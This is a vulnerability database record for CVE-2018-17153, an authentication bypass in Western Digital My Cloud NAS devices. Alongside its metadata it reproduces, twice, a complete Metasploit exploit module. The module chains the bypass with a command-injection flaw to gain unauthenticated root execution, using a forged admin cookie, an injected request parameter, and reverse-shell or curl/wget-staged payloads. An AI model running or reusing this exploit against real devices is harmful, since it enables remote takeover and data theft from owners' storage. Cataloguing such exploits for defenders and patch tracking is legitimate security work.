var-201809-0306
Vulnerability from variot
It was discovered that the Western Digital My Cloud device before 2.30.196 is affected by an authentication bypass vulnerability. An unauthenticated attacker can exploit this vulnerability to authenticate as an admin user without needing to provide a password, thereby gaining full control of the device. (Whenever an admin logs into My Cloud, a server-side session is created that is bound to the user's IP address. After the session is created, it is possible to call authenticated CGI modules by sending the cookie username=admin in the HTTP request. The invoked CGI will check if a valid session is present and bound to the user's IP address.) It was found that it is possible for an unauthenticated attacker to create a valid session without a login. The network_mgr.cgi CGI module contains a command called "cgi_get_ipv6" that starts an admin session -- tied to the IP address of the user making the request -- if the additional parameter "flag" with the value "1" is provided. Subsequent invocation of commands that would normally require admin privileges now succeed if an attacker sets the username=admin cookie. An attacker can exploit this issue to bypass authentication mechanism and perform unauthorized actions. This may lead to further attacks. ##
This module requires Metasploit: https://metasploit.com/download
Current source: https://github.com/rapid7/metasploit-framework
class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {}) super( update_info( info, 'Name' => 'Western Digital MyCloud unauthenticated command injection', 'Description' => %q{ This module exploits authentication bypass (CVE-2018-17153) and command injection (CVE-2016-10108) vulnerabilities in Western Digital MyCloud before 2.30.196 in order to achieve unauthenticated remote code execution as the root user.
The module first performs a check to see if the target is
WD MyCloud. If so, it attempts to trigger an authentication
bypass (CVE-2018-17153) via a crafted GET request to
/cgi-bin/network_mgr.cgi. If the server responds as expected,
the module assesses the vulnerability status by attempting to
exploit a commend injection vulnerability (CVE-2016-10108) in
order to print a random string via the echo command. This is
done via a crafted POST request to /web/google_analytics.php.
If the server is vulnerable, the same command injection vector
is leveraged to execute the payload.
This module has been successfully tested against Western Digital
MyCloud version 2.30.183.
Note: based on the available disclosures, it seems that the
command injection vector (CVE-2016-10108) might be exploitable
without the authentication bypass (CVE-2018-17153) on versions
before 2.21.126. The obtained results on 2.30.183 imply that
the patch for CVE-2016-10108 did not actually remove the command
injection vector, but only prevented unauthenticated access to it.
},
'License' => MSF_LICENSE,
'Author' => [
'Erik Wynter', # @wyntererik - Metasploit
'Steven Campbell', # CVE-2016-10108 disclosure and PoC
'Remco Vermeulen' # CVE-2018-17153 disclosure and PoC
],
'References' => [
['CVE', '2016-10108'], # command injection in /web/google_analytics.php via a modified arg parameter in the POST data.
['CVE', '2018-17153'], # authentication bypass
['URL', 'https://www.securify.nl/advisory/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges/'], # CVE-2018-17153 disclosure and PoC
['URL', 'https://web.archive.org/web/20170315123948/https://www.stevencampbell.info/2016/12/command-injection-in-western-digital-mycloud-nas/'] # CVE-2016-10108 disclosure and PoC
],
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true
},
'Platform' => %w[linux unix],
'Arch' => [ ARCH_ARMLE, ARCH_CMD ],
'Targets' => [
[
'Unix In-Memory',
{
'Platform' => [ 'unix', 'linux' ],
'Arch' => ARCH_CMD,
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' },
'Type' => :unix_memory
}
],
[
'Linux Dropper', {
'Arch' => [ARCH_ARMLE],
'Platform' => 'linux',
'DefaultOptions' => {
'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp',
'CMDSTAGER::FLAVOR' => :curl
},
'Type' => :linux_dropper
}
]
],
'CmdStagerFlavor' => ['curl', 'wget'],
'Privileged' => true,
'DisclosureDate' => '2016-12-14', # CVE-2016-10108 disclosure date
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [ CRASH_SAFE ],
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
'Reliability' => [ REPEATABLE_SESSION ]
}
)
)
register_options([
OptString.new('TARGETURI', [true, 'The base path to WD MyCloud', '/']),
])
end
def check # sanity check to see if the target is likely WD MyCloud res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path) })
return CheckCode::Unknown('Connection failed.') unless res
return CheckCode::Safe('Target is not a WD MyCloud application.') unless res.code == 200 && res.body.include?('var MODEL_ID = "WDMyCloud')
print_status("#{rhost}:#{rport} - The target is WD MyCloud. Checking vulnerability status...")
# try the authentication bypass (CVE-2018-17153)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'network_mgr.cgi'),
'vars_get' => {
'cmd' => 'cgi_get_ipv6',
'flag' => 1 # this cannot be randomized according to the CVE-2018-17153 details
}
})
return CheckCode::Unknown('Connection failed while attempting to trigger the authentication bypass.') unless res
return CheckCode::Unknown("Received unexpected response code #{res.code} while attempting to trigger the authentication bypass.") unless res.code == 404
# send a command to print a random string via echo. if the target is vulnerable, both the command and the command output will be part of the response body
echo_cmd = "echo #{Rex::Text.rand_text_alphanumeric(8..42)}"
print_status("#{rhost}:#{rport} - Attempting to execute #{echo_cmd}...")
res = execute_command(echo_cmd, { 'wait_for_response' => true })
return CheckCode::Unknown('Connection failed while trying to execute the echo command to check the vulnerability status.') unless res
return CheckCode::Vulnerable('The target executed the echo command.') if res.code == 200 && res.body.include?(echo_cmd) && res.body.include?('"success":true')
CheckCode::Safe('The target failed to execute the echo command.')
end
def execute_command(cmd, opts = {})
request_hash = {
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'web', 'google_analytics.php'),
'cookie' => 'username=admin',
'vars_post' => {
'cmd' => 'set',
'opt' => 'cloud-device-num',
'arg' => "0|echo #{cmd} #"
}
}
return send_request_cgi(request_hash) if opts['wait_for_response']
# if we are trying to execute the payload, we can just yeet it at the server and return without waiting for a response
send_request_cgi(request_hash, 0)
end
def exploit if target.arch.first == ARCH_CMD print_status("#{rhost}:#{rport} - Executing the payload. This may take a few seconds...") execute_command(payload.encoded) else execute_cmdstager(background: true) end end end
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201809-0306",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "my cloud ex2100",
"scope": "lt",
"trust": 1.0,
"vendor": "western digital",
"version": "2.30.196"
},
{
"model": "my cloud pr2100",
"scope": "lt",
"trust": 1.0,
"vendor": "western digital",
"version": "2.30.196"
},
{
"model": "my cloud mirror gen 2",
"scope": "lt",
"trust": 1.0,
"vendor": "western digital",
"version": "2.30.196"
},
{
"model": "my cloud ex2 ultra",
"scope": "lt",
"trust": 1.0,
"vendor": "western digital",
"version": "2.30.196"
},
{
"model": "my cloud ex4",
"scope": "lt",
"trust": 1.0,
"vendor": "western digital",
"version": "2.30.196"
},
{
"model": "my cloud wdbctl0020hwt",
"scope": "lt",
"trust": 1.0,
"vendor": "western digital",
"version": "2.30.196"
},
{
"model": "my cloud dl2100",
"scope": "lt",
"trust": 1.0,
"vendor": "western digital",
"version": "2.30.196"
},
{
"model": "my cloud ex4100",
"scope": "lt",
"trust": 1.0,
"vendor": "western digital",
"version": "2.30.196"
},
{
"model": "my cloud ex2",
"scope": "lt",
"trust": 1.0,
"vendor": "western digital",
"version": "2.30.196"
},
{
"model": "my cloud pr4100",
"scope": "lt",
"trust": 1.0,
"vendor": "western digital",
"version": "2.30.196"
},
{
"model": "my cloud dl4100",
"scope": "lt",
"trust": 1.0,
"vendor": "western digital",
"version": "2.30.196"
},
{
"model": "my cloud mirror",
"scope": "lt",
"trust": 1.0,
"vendor": "western digital",
"version": "2.30.196"
},
{
"model": "my cloud dl2100",
"scope": null,
"trust": 0.8,
"vendor": "western digital",
"version": null
},
{
"model": "my cloud dl4100",
"scope": null,
"trust": 0.8,
"vendor": "western digital",
"version": null
},
{
"model": "my cloud ex2 ultra",
"scope": null,
"trust": 0.8,
"vendor": "western digital",
"version": null
},
{
"model": "my cloud ex2",
"scope": null,
"trust": 0.8,
"vendor": "western digital",
"version": null
},
{
"model": "my cloud ex2100",
"scope": null,
"trust": 0.8,
"vendor": "western digital",
"version": null
},
{
"model": "my cloud ex4",
"scope": null,
"trust": 0.8,
"vendor": "western digital",
"version": null
},
{
"model": "my cloud ex4100",
"scope": null,
"trust": 0.8,
"vendor": "western digital",
"version": null
},
{
"model": "my cloud mirror gen2",
"scope": null,
"trust": 0.8,
"vendor": "western digital",
"version": null
},
{
"model": "my cloud mirror",
"scope": null,
"trust": 0.8,
"vendor": "western digital",
"version": null
},
{
"model": "my cloud pr2100",
"scope": null,
"trust": 0.8,
"vendor": "western digital",
"version": null
},
{
"model": "my cloud wdbctl0020hwt",
"scope": null,
"trust": 0.8,
"vendor": "western digital",
"version": null
},
{
"model": "digital my cloud wdbctl0020hwt",
"scope": "eq",
"trust": 0.3,
"vendor": "western",
"version": "2.30.172"
},
{
"model": "digital my cloud pr4100",
"scope": "eq",
"trust": 0.3,
"vendor": "western",
"version": "0"
},
{
"model": "digital my cloud pr2100",
"scope": "eq",
"trust": 0.3,
"vendor": "western",
"version": "0"
},
{
"model": "digital my cloud mirror gen",
"scope": "eq",
"trust": 0.3,
"vendor": "western",
"version": "20"
},
{
"model": "digital my cloud mirror",
"scope": "eq",
"trust": 0.3,
"vendor": "western",
"version": "0"
},
{
"model": "digital my cloud ex4100",
"scope": "eq",
"trust": 0.3,
"vendor": "western",
"version": "0"
},
{
"model": "digital my cloud ex4",
"scope": "eq",
"trust": 0.3,
"vendor": "western",
"version": "0"
},
{
"model": "digital my cloud ex2100",
"scope": "eq",
"trust": 0.3,
"vendor": "western",
"version": "0"
},
{
"model": "digital my cloud ex2 ultra",
"scope": "eq",
"trust": 0.3,
"vendor": "western",
"version": "0"
},
{
"model": "digital my cloud ex2",
"scope": "eq",
"trust": 0.3,
"vendor": "western",
"version": "0"
},
{
"model": "digital my cloud dl4100",
"scope": "eq",
"trust": 0.3,
"vendor": "western",
"version": "0"
},
{
"model": "digital my cloud dl2100",
"scope": "eq",
"trust": 0.3,
"vendor": "western",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "105359"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012205"
},
{
"db": "NVD",
"id": "CVE-2018-17153"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:wdc:my_cloud_dl2100",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:wdc:my_cloud_dl4100_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:wdc:my_cloud_ex2_ultra_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:wdc:my_cloud_ex2_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:wdc:my_cloud_ex2100_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:wdc:my_cloud_ex4_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:wdc:my_cloud_ex4100",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:wdc:my_cloud_mirror_gen_2_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:wdc:my_cloud_mirror_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:wdc:my_cloud_pr2100_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:wdc:my_cloud_wdbctl0020hwt_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-012205"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Exploitee.rs, Infosec shop Securify",
"sources": [
{
"db": "BID",
"id": "105359"
}
],
"trust": 0.3
},
"cve": "CVE-2018-17153",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2018-17153",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2018-17153",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-17153",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2018-17153",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNNVD",
"id": "CNNVD-201809-848",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULMON",
"id": "CVE-2018-17153",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-17153"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012205"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-848"
},
{
"db": "NVD",
"id": "CVE-2018-17153"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "It was discovered that the Western Digital My Cloud device before 2.30.196 is affected by an authentication bypass vulnerability. An unauthenticated attacker can exploit this vulnerability to authenticate as an admin user without needing to provide a password, thereby gaining full control of the device. (Whenever an admin logs into My Cloud, a server-side session is created that is bound to the user\u0027s IP address. After the session is created, it is possible to call authenticated CGI modules by sending the cookie username=admin in the HTTP request. The invoked CGI will check if a valid session is present and bound to the user\u0027s IP address.) It was found that it is possible for an unauthenticated attacker to create a valid session without a login. The network_mgr.cgi CGI module contains a command called \"cgi_get_ipv6\" that starts an admin session -- tied to the IP address of the user making the request -- if the additional parameter \"flag\" with the value \"1\" is provided. Subsequent invocation of commands that would normally require admin privileges now succeed if an attacker sets the username=admin cookie. \nAn attacker can exploit this issue to bypass authentication mechanism and perform unauthorized actions. This may lead to further attacks. ##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule \u003c Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n \u0027Name\u0027 =\u003e \u0027Western Digital MyCloud unauthenticated command injection\u0027,\n \u0027Description\u0027 =\u003e %q{\n This module exploits authentication bypass (CVE-2018-17153) and\n command injection (CVE-2016-10108) vulnerabilities in Western\n Digital MyCloud before 2.30.196 in order to achieve\n unauthenticated remote code execution as the root user. \n\n The module first performs a check to see if the target is\n WD MyCloud. If so, it attempts to trigger an authentication\n bypass (CVE-2018-17153) via a crafted GET request to\n /cgi-bin/network_mgr.cgi. If the server responds as expected,\n the module assesses the vulnerability status by attempting to\n exploit a commend injection vulnerability (CVE-2016-10108) in\n order to print a random string via the echo command. This is\n done via a crafted POST request to /web/google_analytics.php. \n\n If the server is vulnerable, the same command injection vector\n is leveraged to execute the payload. \n\n This module has been successfully tested against Western Digital\n MyCloud version 2.30.183. \n\n Note: based on the available disclosures, it seems that the\n command injection vector (CVE-2016-10108) might be exploitable\n without the authentication bypass (CVE-2018-17153) on versions\n before 2.21.126. The obtained results on 2.30.183 imply that\n the patch for CVE-2016-10108 did not actually remove the command\n injection vector, but only prevented unauthenticated access to it. \n },\n \u0027License\u0027 =\u003e MSF_LICENSE,\n \u0027Author\u0027 =\u003e [\n \u0027Erik Wynter\u0027, # @wyntererik - Metasploit\n \u0027Steven Campbell\u0027, # CVE-2016-10108 disclosure and PoC\n \u0027Remco Vermeulen\u0027 # CVE-2018-17153 disclosure and PoC\n ],\n \u0027References\u0027 =\u003e [\n [\u0027CVE\u0027, \u00272016-10108\u0027], # command injection in /web/google_analytics.php via a modified arg parameter in the POST data. \n [\u0027CVE\u0027, \u00272018-17153\u0027], # authentication bypass\n [\u0027URL\u0027, \u0027https://www.securify.nl/advisory/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges/\u0027], # CVE-2018-17153 disclosure and PoC\n [\u0027URL\u0027, \u0027https://web.archive.org/web/20170315123948/https://www.stevencampbell.info/2016/12/command-injection-in-western-digital-mycloud-nas/\u0027] # CVE-2016-10108 disclosure and PoC\n ],\n \u0027DefaultOptions\u0027 =\u003e {\n \u0027RPORT\u0027 =\u003e 443,\n \u0027SSL\u0027 =\u003e true\n },\n \u0027Platform\u0027 =\u003e %w[linux unix],\n \u0027Arch\u0027 =\u003e [ ARCH_ARMLE, ARCH_CMD ],\n \u0027Targets\u0027 =\u003e [\n [\n \u0027Unix In-Memory\u0027,\n {\n \u0027Platform\u0027 =\u003e [ \u0027unix\u0027, \u0027linux\u0027 ],\n \u0027Arch\u0027 =\u003e ARCH_CMD,\n \u0027DefaultOptions\u0027 =\u003e { \u0027PAYLOAD\u0027 =\u003e \u0027cmd/unix/reverse_bash\u0027 },\n \u0027Type\u0027 =\u003e :unix_memory\n }\n ],\n [\n \u0027Linux Dropper\u0027, {\n \u0027Arch\u0027 =\u003e [ARCH_ARMLE],\n \u0027Platform\u0027 =\u003e \u0027linux\u0027,\n \u0027DefaultOptions\u0027 =\u003e {\n \u0027PAYLOAD\u0027 =\u003e \u0027linux/armle/meterpreter/reverse_tcp\u0027,\n \u0027CMDSTAGER::FLAVOR\u0027 =\u003e :curl\n },\n \u0027Type\u0027 =\u003e :linux_dropper\n }\n ]\n ],\n \u0027CmdStagerFlavor\u0027 =\u003e [\u0027curl\u0027, \u0027wget\u0027],\n \u0027Privileged\u0027 =\u003e true,\n \u0027DisclosureDate\u0027 =\u003e \u00272016-12-14\u0027, # CVE-2016-10108 disclosure date\n \u0027DefaultTarget\u0027 =\u003e 0,\n \u0027Notes\u0027 =\u003e {\n \u0027Stability\u0027 =\u003e [ CRASH_SAFE ],\n \u0027SideEffects\u0027 =\u003e [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],\n \u0027Reliability\u0027 =\u003e [ REPEATABLE_SESSION ]\n }\n )\n )\n\n register_options([\n OptString.new(\u0027TARGETURI\u0027, [true, \u0027The base path to WD MyCloud\u0027, \u0027/\u0027]),\n ])\n end\n\n def check\n # sanity check to see if the target is likely WD MyCloud\n res = send_request_cgi({\n \u0027method\u0027 =\u003e \u0027GET\u0027,\n \u0027uri\u0027 =\u003e normalize_uri(target_uri.path)\n })\n\n return CheckCode::Unknown(\u0027Connection failed.\u0027) unless res\n\n return CheckCode::Safe(\u0027Target is not a WD MyCloud application.\u0027) unless res.code == 200 \u0026\u0026 res.body.include?(\u0027var MODEL_ID = \"WDMyCloud\u0027)\n\n print_status(\"#{rhost}:#{rport} - The target is WD MyCloud. Checking vulnerability status...\")\n # try the authentication bypass (CVE-2018-17153)\n res = send_request_cgi({\n \u0027method\u0027 =\u003e \u0027GET\u0027,\n \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027cgi-bin\u0027, \u0027network_mgr.cgi\u0027),\n \u0027vars_get\u0027 =\u003e {\n \u0027cmd\u0027 =\u003e \u0027cgi_get_ipv6\u0027,\n \u0027flag\u0027 =\u003e 1 # this cannot be randomized according to the CVE-2018-17153 details\n }\n })\n\n return CheckCode::Unknown(\u0027Connection failed while attempting to trigger the authentication bypass.\u0027) unless res\n\n return CheckCode::Unknown(\"Received unexpected response code #{res.code} while attempting to trigger the authentication bypass.\") unless res.code == 404\n\n # send a command to print a random string via echo. if the target is vulnerable, both the command and the command output will be part of the response body\n echo_cmd = \"echo #{Rex::Text.rand_text_alphanumeric(8..42)}\"\n print_status(\"#{rhost}:#{rport} - Attempting to execute #{echo_cmd}...\")\n res = execute_command(echo_cmd, { \u0027wait_for_response\u0027 =\u003e true })\n\n return CheckCode::Unknown(\u0027Connection failed while trying to execute the echo command to check the vulnerability status.\u0027) unless res\n\n return CheckCode::Vulnerable(\u0027The target executed the echo command.\u0027) if res.code == 200 \u0026\u0026 res.body.include?(echo_cmd) \u0026\u0026 res.body.include?(\u0027\"success\":true\u0027)\n\n CheckCode::Safe(\u0027The target failed to execute the echo command.\u0027)\n end\n\n def execute_command(cmd, opts = {})\n request_hash = {\n \u0027method\u0027 =\u003e \u0027POST\u0027,\n \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027web\u0027, \u0027google_analytics.php\u0027),\n \u0027cookie\u0027 =\u003e \u0027username=admin\u0027,\n \u0027vars_post\u0027 =\u003e {\n \u0027cmd\u0027 =\u003e \u0027set\u0027,\n \u0027opt\u0027 =\u003e \u0027cloud-device-num\u0027,\n \u0027arg\u0027 =\u003e \"0|echo `#{cmd}` #\"\n }\n }\n\n return send_request_cgi(request_hash) if opts[\u0027wait_for_response\u0027]\n\n # if we are trying to execute the payload, we can just yeet it at the server and return without waiting for a response\n send_request_cgi(request_hash, 0)\n end\n\n def exploit\n if target.arch.first == ARCH_CMD\n print_status(\"#{rhost}:#{rport} - Executing the payload. This may take a few seconds...\")\n execute_command(payload.encoded)\n else\n execute_cmdstager(background: true)\n end\n end\nend\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-17153"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012205"
},
{
"db": "BID",
"id": "105359"
},
{
"db": "VULMON",
"id": "CVE-2018-17153"
},
{
"db": "PACKETSTORM",
"id": "173802"
}
],
"trust": 2.07
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-17153",
"trust": 2.9
},
{
"db": "BID",
"id": "105359",
"trust": 1.4
},
{
"db": "PACKETSTORM",
"id": "173802",
"trust": 1.2
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012205",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201809-848",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2018-17153",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-17153"
},
{
"db": "BID",
"id": "105359"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012205"
},
{
"db": "PACKETSTORM",
"id": "173802"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-848"
},
{
"db": "NVD",
"id": "CVE-2018-17153"
}
]
},
"id": "VAR-201809-0306",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.85714287
},
"last_update_date": "2024-11-23T22:13:11.374000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Answer ID 25952",
"trust": 0.8,
"url": "https://support.wdc.com/knowledgebase/answer.aspx?ID=25952"
},
{
"title": "The Register",
"trust": 0.2,
"url": "https://www.theregister.co.uk/2018/09/18/remote_access_vulnerability_western_digital_my_cloud/"
},
{
"title": "BleepingComputer",
"trust": 0.1,
"url": "https://www.bleepingcomputer.com/news/security/my-cloud-nas-devices-vulnerable-to-auth-bypass-for-over-a-year/"
},
{
"title": "BleepingComputer",
"trust": 0.1,
"url": "https://www.bleepingcomputer.com/news/security/western-digital-releases-hotfix-for-my-cloud-auth-bypass-vulnerability/"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-17153"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012205"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-012205"
},
{
"db": "NVD",
"id": "CVE-2018-17153"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://securify.nl/nl/advisory/sfy20180102/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges.html"
},
{
"trust": 1.2,
"url": "http://www.securityfocus.com/bid/105359"
},
{
"trust": 1.1,
"url": "https://support.wdc.com/knowledgebase/answer.aspx?id=25952"
},
{
"trust": 1.1,
"url": "http://packetstormsecurity.com/files/173802/western-digital-mycloud-unauthenticated-command-injection.html"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-17153"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-17153"
},
{
"trust": 0.3,
"url": "https://www.securify.nl/advisory/sfy20180102/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges.html"
},
{
"trust": 0.3,
"url": "https://www.wdc.com"
},
{
"trust": 0.3,
"url": "https://blog.westerndigital.com/western-digital-my-cloud-update/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/287.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.bleepingcomputer.com/news/security/my-cloud-nas-devices-vulnerable-to-auth-bypass-for-over-a-year/"
},
{
"trust": 0.1,
"url": "https://metasploit.com/download"
},
{
"trust": 0.1,
"url": "https://web.archive.org/web/20170315123948/https://www.stevencampbell.info/2016/12/command-injection-in-western-digital-mycloud-nas/\u0027]"
},
{
"trust": 0.1,
"url": "https://github.com/rapid7/metasploit-framework"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-10108"
},
{
"trust": 0.1,
"url": "https://www.securify.nl/advisory/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges/\u0027],"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-17153"
},
{
"db": "BID",
"id": "105359"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012205"
},
{
"db": "PACKETSTORM",
"id": "173802"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-848"
},
{
"db": "NVD",
"id": "CVE-2018-17153"
}
]
},
"sources": {
"@context": {
